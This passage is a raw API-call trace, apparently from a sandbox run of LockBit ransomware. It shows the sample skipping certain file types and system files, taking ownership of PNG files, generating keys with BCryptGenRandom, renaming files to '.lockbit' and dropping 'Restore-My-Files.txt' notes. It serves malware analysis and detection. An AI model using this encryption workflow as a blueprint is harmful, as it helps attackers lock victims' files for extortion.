(lpString1=".lock", lpString2=".png") returned -1 [0081.133] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.133] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.133] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.133] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.134] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.134] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.134] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.134] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.134] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.134] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.134] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.134] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.134] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.134] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.134] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="colorcycle.png") returned 1 [0081.134] lstrcmpiW (lpString1="ntldr", lpString2="colorcycle.png") returned 1 [0081.134] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="colorcycle.png") returned 1 [0081.134] lstrcmpiW (lpString1="bootsect.bak", lpString2="colorcycle.png") returned -1 [0081.135] lstrcmpiW (lpString1="autorun.inf", lpString2="colorcycle.png") returned -1 [0081.135] lstrcmpiW (lpString1="thumbs.db", lpString2="colorcycle.png") returned 1 [0081.135] lstrcmpiW (lpString1="iconcache.db", lpString2="colorcycle.png") returned 1 [0081.135] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\") returned="" [0081.135] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned=".png" [0081.135] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.135] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.135] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.135] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.135] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.135] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.136] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.136] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.136] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.136] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.136] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.136] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png.lockbit") returned 76 [0081.136] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\colorcycle.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.136] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.136] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.136] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.137] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.137] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.137] RtlFreeAnsiString (AnsiString="\\") [0081.137] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0081.137] malloc (_Size=0x200) returned 0x77d800 [0081.137] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.137] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.137] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.137] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.138] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.138] CloseHandle (hObject=0x3c4) returned 1 [0081.138] free (_Block=0x77d800) [0081.138] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\colorcycle.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.138] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.138] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.138] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=17378) returned 1 [0081.138] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.138] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.139] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.139] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.139] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.143] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.143] malloc (_Size=0xae) returned 0x77d800 [0081.148] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0081.148] free (_Block=0x77d800) [0081.148] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 1 [0081.149] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt") returned 74 [0081.149] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.149] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb44f02, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb44f02, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb57, dwReserved0=0x0, dwReserved1=0x0, cFileName="huemainsubpicture2.png", cAlternateFileName="")) returned 1 [0081.149] lstrcmpiW (lpString1=".", lpString2="huemainsubpicture2.png") returned -1 [0081.149] lstrcmpiW (lpString1="..", lpString2="huemainsubpicture2.png") returned -1 [0081.149] PathFindExtensionW (pszPath="huemainsubpicture2.png") returned=".png" [0081.149] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.149] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.149] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.149] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.149] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.150] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.150] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.150] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.150] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.150] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.150] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.150] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.150] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.150] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="huemainsubpicture2.png") returned 1 [0081.150] lstrcmpiW (lpString1="ntldr", lpString2="huemainsubpicture2.png") returned 1 [0081.150] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="huemainsubpicture2.png") returned 1 [0081.150] lstrcmpiW (lpString1="bootsect.bak", lpString2="huemainsubpicture2.png") returned -1 [0081.150] lstrcmpiW (lpString1="autorun.inf", lpString2="huemainsubpicture2.png") returned -1 [0081.150] lstrcmpiW (lpString1="thumbs.db", lpString2="huemainsubpicture2.png") returned 1 [0081.151] lstrcmpiW (lpString1="iconcache.db", lpString2="huemainsubpicture2.png") returned 1 [0081.151] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\") returned="" [0081.151] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned=".png" [0081.151] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.151] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.151] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.151] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.151] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.151] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.151] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.151] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.151] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.151] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.152] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.152] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png.lockbit") returned 84 [0081.152] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\huemainsubpicture2.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.152] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.152] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.152] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.153] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.153] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.153] RtlFreeAnsiString (AnsiString="\\") [0081.153] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0081.153] malloc (_Size=0x200) returned 0x77d800 [0081.153] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.153] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.153] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.153] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.154] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.154] CloseHandle (hObject=0x3c4) returned 1 [0081.154] free (_Block=0x77d800) [0081.154] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\huemainsubpicture2.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.154] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.154] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.154] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=2903) returned 1 [0081.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.155] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.155] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.155] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.155] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.164] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.164] malloc (_Size=0xbe) returned 0x77d800 [0081.164] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbe, FileInformationClass=0xa) returned 0xc0000008 [0081.165] free (_Block=0x77d800) [0081.165] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 1 [0081.165] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt") returned 74 [0081.165] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.165] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc29730, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fc29730, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0081.165] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0081.165] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0081.165] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0081.165] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.165] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.165] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.165] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.165] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.165] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.165] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.165] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.165] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.165] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.165] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.165] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.165] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.166] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.166] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.166] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.166] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.166] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.166] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.166] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.166] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.166] 